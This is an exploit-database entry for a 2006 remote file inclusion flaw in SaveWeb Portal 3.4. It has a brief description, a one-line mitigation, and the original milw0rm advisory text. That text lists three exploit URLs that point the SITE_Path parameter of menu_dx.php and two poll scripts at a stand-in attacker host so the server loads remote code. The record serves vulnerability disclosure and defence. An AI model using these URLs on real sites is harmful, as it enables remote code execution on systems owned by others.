header-logo
Suggest Exploit
vendor:
Portal
by:
xoron
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Portal
Affected Version From: 3.4
Affected Version To: 3.4
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

SaveWeb Portal 3.4 Remote File Inclusion Vulnerability

SaveWeb Portal 3.4 is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL in the SITE_Path parameter. The malicious URL can be used to execute arbitrary code on the vulnerable system. The vulnerable code is located in the menu_dx.php, poll/poll.php and poll/view_polls.php files.

Mitigation:

To mitigate this vulnerability, the application should validate the SITE_Path parameter and only allow trusted URLs.
Source

Exploit-DB raw data:

///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\

#SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability

#Author: xoron

#script: SaveWeb Portal

#Class : Remote

#cont@ct: x0r0n[at]hotmail[dot]com

#CODE:    include($SITE_Path."poll/poll.php")

#Exploit:
http://www.site.com/[path]/menu_dx.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/poll.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/view_polls.php?SITE_Path=http://evil_scripts?

#Thanx : WWW.CYBER-WARRiOR.ORG

#Greetz: DJR, x-mastER, LASTSCREAM , zip72_72, R3D4C!D and all cyber-warrior users.

# milw0rm.com [2006-08-02]